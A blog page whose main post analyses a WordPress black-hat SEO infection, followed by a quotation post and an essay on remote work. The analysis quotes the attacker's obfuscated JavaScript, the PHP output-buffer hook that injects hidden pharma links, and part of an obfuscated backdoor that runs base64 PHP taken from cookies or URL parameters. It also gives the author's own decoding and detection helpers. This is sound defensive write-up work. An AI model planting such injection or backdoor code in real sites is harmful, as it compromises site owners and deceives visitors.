September 17, 2013

WordPress Black Hat SEO dissected

Posted in Software at 21:00 by graham

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy-hosted WordPress site, and that led me down the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:


From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere in the page source. It’s being written out by this obfuscated JavaScript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);

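The script joins the digit strings, reads them three digits at a time, subtracts 70 from each number, and turns the result into a character with String.fromCharCode (itself spelled out in pieces as "fr"+"omCh"+"arCo"+"de"). Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies; maybe it’s random, or maybe it’s a version number. You can find many other victims by searching for 13018518….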
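The decoding loop is easy to replay outside the browser. What follows is a minimal sketch, not the attacker's code: `decodeTriples` is a name invented here, and it assumes, as the loop above does, that every group of three digits is a character code offset by 70.

```javascript
// The six digit strings pushed onto _gw7 in the injected script, in order.
const chunks = [
  '1301851861911781711021861911821711311041861711901861171',
  '6918518510413211616817818117316919116917817116518219318',
  '2181185175186175181180128167168185181178187186171129169',
  '1781751821281841711691861101221211261821901141671871861',
  '8111416718718618111412212112618219011112919513011718518',
  '6191178171132',
];

// Hypothetical helper: join the chunks, read three digits at a time,
// subtract the offset and turn each result into a character.
function decodeTriples(parts, offset = 70) {
  const digits = parts.join('');
  let out = '';
  for (let pos = 0; pos < digits.length; pos += 3) {
    const code = parseInt(digits.slice(pos, pos + 3), 10) - offset;
    out += String.fromCharCode(code);
  }
  return out;
}

// Prints the hidden <style> rule for .blogcycle_p quoted earlier in the post.
console.log(decodeTriples(chunks));
```

Run with Node.js or pasted into a browser console, this recovers the CSS without executing anything from the infected page.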

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is that the PHP has been edited. The functions.php in every single theme had this appended to the bottom (scroll all the way to the right for the important part):

if (!function_exists("b_call")) {
function b_call() {
    if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
    if (!defined('wp_m1')) {
        if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
            return $p;
        }
        list($m, $n) = @unserialize(trim(strrev($m)));
        define('wp_m1', $m);
        define('wp_n1', $n);
    }
    if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
    if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
    return $p;
}
function b_end() {
    if (ob_get_level()) ob_end_clean();
}
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') call reads a value from the database; the code then reverses it, unserializes it into two strings, and injects them into the page through an output buffer callback. The name of the option changes; presumably it’s picked from a list at infection time. There’s a nice touch here where it doesn’t show to logged-in users, or to anyone carrying the WordPress cookies it checks for, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).
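The visibility check is worth spelling out, because it explains why the site owner never saw the links. Below is a rough model of that one condition in JavaScript; `servedClean` and `ADMIN_COOKIES` are names made up for this sketch, and it only approximates PHP's truthiness rules for the option value.

```javascript
// Cookie names tested by the injected b_goes() function.
const ADMIN_COOKIES = ['wordpress_test_cookie', 'wp-settings-1', 'wp-settings-time-1'];

// Hypothetical model of the check: returns true when the page would be
// passed through untouched, false when the hidden links would be injected.
function servedClean(cookieNames, loggedIn, optionValue) {
  const hasAdminCookie = cookieNames.some((name) => ADMIN_COOKIES.includes(name));
  // The last term mirrors "!$m = get_option(...)": a missing or empty option.
  return hasAdminCookie || loggedIn || !optionValue;
}

console.log(servedClean(['wp-settings-1'], false, 'payload')); // true: owner's browser
console.log(servedClean([], false, 'payload'));                // false: anonymous visitor
```

In practice this means checking a suspect site from a browser profile, or a command-line client, that has never visited its login page.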

In the wp_options database table, the _iconfeed1 option contains the JavaScript and HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some WordPress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.
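A search can still find a value stored this way if the search term is reversed instead of the dump. A minimal sketch, assuming the dump has been read into a string; `findReversed` and the sample value are invented for illustration and are not the real option contents.

```javascript
// Reverse a string by code point (plenty for ASCII markup like this).
function reverse(s) {
  return Array.from(s).reverse().join('');
}

// Hypothetical helper: index at which `needle` appears back to front
// inside `haystack`, or -1 if it does not appear.
function findReversed(haystack, needle) {
  return haystack.indexOf(reverse(needle));
}

// Made-up stand-in for one wp_options value, stored reversed.
const stored = reverse('<style type="text/css">.blogcycle_p{}</style>');

console.log(stored.includes('blogcycle_p'));          // false: a plain search misses it
console.log(findReversed(stored, 'blogcycle_p') >= 0); // true: the reversed search hits
```

The same trick works with grep by reversing the pattern first.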

Back end – input

But wait, it’s about to get so much better, because the next question is: how the hell did they write to wp_options? An svn diff of the WordPress install against the repo reveals these new files:

  • wp-content//entry-nav.php # In several, but not all, themes
  • wp-content//sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php
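Without a Subversion checkout to diff against, the same idea can be approximated by comparing file listings. This is a sketch under assumptions: `unexpectedFiles` is a hypothetical helper, and both arrays are expected to hold relative paths, one from the live install and one from a clean copy of the same WordPress version.

```javascript
// Hypothetical helper: paths present in the install but absent from a
// clean copy of the same WordPress version.
function unexpectedFiles(installed, clean) {
  const known = new Set(clean);
  return installed.filter((path) => !known.has(path)).sort();
}

// Tiny illustrative listings; a real run would walk both directory trees.
const clean = ['wp-admin/index.php', 'wp-includes/post.php'];
const installed = [...clean, 'wp-includes/post-load.php', 'wp-admin/ms-media.php'];

console.log(unexpectedFiles(installed, clean));
```

A listing comparison only catches added files. Edited files, such as the modified functions.php, still need a content diff or checksums.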

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those files? Oh, you’re in for a treat – here are the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variable names clearly taken from a word list. Most of them didn’t seem to run: they were missing variables and a closing PHP tag. For analysis, here’s a full one (minus PHP tag) that did run, and that I’ve hacked around to display its output: obfuscated php (To understand it look for ‘hello’).

It decodes to this:

    ? $i["b02005f9ffdf8"]:

That takes base64-encoded PHP code in either a URL parameter or a cookie, and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too. It changes for each infection and acts as a key, so other people will have a hard time taking advantage of the back door.
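When a payload does turn up in a log, for instance in a query string, decoding it is a single call in Node.js. A minimal sketch: `decodePayload` is an invented name, and the sample is a harmless echo statement encoded in place rather than anything captured from a real request.

```javascript
// Hypothetical helper: turn a captured base64 parameter back into PHP source.
function decodePayload(encoded) {
  return Buffer.from(encoded, 'base64').toString('utf8');
}

// Harmless sample, encoded here so the example is self-contained.
const sample = Buffer.from('echo "<h1>Hello</h1>";', 'utf8').toString('base64');

console.log(sample);                // the form it would take on the wire
console.log(decodePayload(sample)); // the PHP the back door would have run
```

A value copied from a URL may also be percent-encoded, in which case it needs `decodeURIComponent` before the base64 step.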

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

Who did it? How?

Who did it? In the Apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because the payload came in a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute-force cracking attempts, but POSTing to the login page gets you only about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).
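To put that rate in perspective, here is a back-of-the-envelope calculation. The password shape used below (8 characters drawn from lowercase letters and digits) is purely an assumption for illustration; the post does not say what the real passwords looked like.

```javascript
const SECONDS_PER_DAY = 24 * 60 * 60;

// Guesses a single attacker gets per day at a given request rate.
function attemptsPerDay(perSecond) {
  return perSecond * SECONDS_PER_DAY;
}

// Days needed to try every password of `length` characters drawn from an
// alphabet of `alphabetSize` symbols (worst case, one attacker, no lockout).
function daysToExhaust(alphabetSize, length, perSecond) {
  return Math.pow(alphabetSize, length) / attemptsPerDay(perSecond);
}

console.log(attemptsPerDay(2));        // 172800
console.log(daysToExhaust(36, 8, 2));  // assumed password shape, see above
```

Even for that modest password the exhaustive search runs to millions of days, which is why guessing through the login form looks like the less likely route in.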

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own WordPress multisite on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated JavaScript, which was written into the database by base64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Black Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about this, please let me know in the comments, and I’ll update the post. Thanks!

September 11, 2013

Quote: Look well to each step

Posted in Misc at 03:08 by graham

From the epilogue of Jon Krakauer’s “Into the Wild”:

Still, the last sad memory hovers round, and sometimes drifts across like floating mist, cutting off sunshine and chilling the remembrance of happier times.

There have been joys too great to be described in words, and there have been griefs upon which I have not dared to dwell; and with these in mind I say: Climb if you will, but remember that courage and strength are nought without prudence, and that a momentary negligence may destroy the happiness of a lifetime.

Do nothing in haste; look well to each step; and from the beginning think what may be the end.

Edward Whymper, Scrambles Amongst the Alps

One of my favorite quotes.

September 2, 2013

What if everyone worked remotely?

Posted in Behaviour at 16:49 by graham

What would happen if everyone had the freedom to work remotely? How would things change?

Many companies such as Lincoln Loop, Mozilla, Automattic, and MySQL AB are already distributed organizations. Central to that philosophy is that only what you do matters, not where or when. Obviously some work, like fishing and truck driving, can’t be done remotely, but in modern economies, a large number of people spend the bulk of their day sitting at a desk. What if they all felt free to work remotely? It’s a fun thought experiment, so here goes – what changes might we see?

Less commuting. Commuting, for most people, is a reliable and persistent source of unhappiness (because it reduces the control you have over your own life). Less commuting also means fewer car miles driven, which means fewer deaths on the road. Less commuting means less pollution and lower demand for oil, with attendant geo-political consequences.

More community. Instead of just sleeping in our homes, we now live there and become part of the community; indeed, we create that community. You can pick up your kids from school at 4pm. You can attend the town hall meeting. You’re supporting the businesses near you. You actually meet and talk to your neighbours. You move somewhere where you like your neighbours :-)
